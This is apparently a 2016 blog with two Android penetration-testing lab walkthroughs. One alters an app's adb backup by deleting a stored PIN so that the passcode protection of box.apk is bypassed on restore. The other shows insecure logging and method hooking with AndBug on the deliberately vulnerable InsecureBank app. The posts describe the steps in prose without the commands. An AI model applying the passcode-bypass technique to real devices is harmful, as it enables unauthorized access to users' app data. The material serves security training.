AdSense

Saturday, December 24, 2016

ANDROID PT / Backup Vulnerability


BACKUP VULNERABILITY

- Layout for this exercise:























- Connecting Santoku to Nexus 5:




- Backup and restoration processes in some Android applications are vulnerable because the backup contents can be altered and later restore back without root privileges.  


- Some of these vulnerabilities were discovered and investigated by Chris John Riley and Aditya Gutpa.

- In this exercise the Android Backup Extractor (abe) will be used:

https://sourceforge.net/projects/adbextractor/





- Once downloaded to Santoku, let's unzip abe:










- On the other hand, to test the backup vulnerability, the application box.apk will be used:




- Installing box.apk to the mobile device:






- Going to Settings, a passcode is introduced:








- From now, to access the application a passcode is needed after 1 minute of timeout: 




- Detecting the name of the package used by the application:





- ADB helps to backup the application, from box.apk, creating the new file box.ab. The extension .ab means "android backup":








- The user is prompted to perform the backup at the mobile device:




- The backup process is successful:












-  hexdump shows the hexadecimal content of box.ab, checking that it is actually an Android backup:







- It is important to notice that an Android Backup (*.ab) file is actually a compressed tar file, that can be created with the Android Backup Extractor, so unpacking box.ab to box.tar:






- Extracting with tar, all the files of box.tar are displayed:





- Listing the files of box.tar to a file box.list:






- Now, the whole package com.box.android is available to be analyzed:





- Going deeper into the folder's structure down to sp (shared preferences):



- Looking up into apps:




- A hardcoded encrypted pin is found at the file myPreference.xml:




- Opening myPreference.xml, the line with the encrypted pin is detected:







- With the purpose of altering the application, the line corresponding to the encrypted pin is just removed:




- Now, to rebuild the application once it has been altered, the pax command is used:











- Redirecting the list of files of box.list (altered) to a new file box1.tar:






- The Android Backup Extractor does the reverse process than before, now packing instead of unpacking, and creating a file box1.ab from the altered box1.tar:






-  hexdump shows the hexadecimal content of box1.ab, checking that it is actually an Android backup:






- Restoring the backup with ADB:




- The user is prompted to perform the restoration (notice that neither passcode nor pin is requested):





- The restoration of data is eventually successful:









- We can also verify that the alteration is effective, by checking that now the Settings configuration says Require passcode = Never, although we set previously a required passcode:







Friday, December 23, 2016

ANDROID PT / Hooking with AndBug


HOOKING WITH ANDBUG
- Layout for this exercise:
- Layout for this exercise:





- Connecting Santoku to Nexus 5:




 0 - INSECURE BANK


- To illustrate the exercises of this post, it will be used the InsecureBank application, written by Dinesh Shetty.

- InsecureBank is an intentionally vulnerable application used to gain training on different Android platform attacks. 

- In this exercise we'll see insecure logging and how to hook the application on the go with the tool AndBug.




- Installing the application from Santoku to Nexus 5, using ADB:






- InsecureBank.apk works in a client/server model, so the server runs at Santoku on port 8888 and the client on the mobile device.


- Starting the server on Santoku with the script app.py, located inside the folder AndroLabServer:






- Starting the application at the mobile device:




- Configuring the preferences:




- Serveip is Santoku's IP:




- Listening port for the server is 8080:





1 - INSECURE LOGGING 

- Once the applications is running, let's detect its PID:





- Logging the application with ADB logcat:





- Introducing the default credentials and signing in:

username: dinesh
password: dines@123$




- logcat informs immediately about the login trial:





- Then, performing a transaction of 1 million dollar from Account 1111 to Account 2222:




- Again, the logging debugger logcat informs immediately about the trasaction:








2 - HOOKING WITH ANDBUG

- Hooking an application is a very useful technique to analyze and understand on the go how applications work.

- AndBug is a wrapper around the JavaTM Debug Wire Protocol (JDWP), what is the protocol used for communication between a debugger and the Java virtual machine (VM) which it debugs, called the target VM.

- AndBug allows to analyze the methods and the passed arguments while the applications is being run, by setting trace and hookup points on those methods.

- AndBug can be found here:

https://github.com/swdunlop/AndBug





- Once AndBug downloaded and installed on Linux Santoku:




- Installing the setup.py file:




- Looking up for the PID of the application insecurebank.apk:




- Using the command andbug over the PID, and loading the classes for the package of the application:




- Checking what are the methods used by the .RestClient class:




- Setting up a hook for the .dotransfer method:




- Performing a transaction with the mobile application:




- When the .dotransfer method is called and the arguments passed to the application, AndBug displays remotely all the details about the transaction: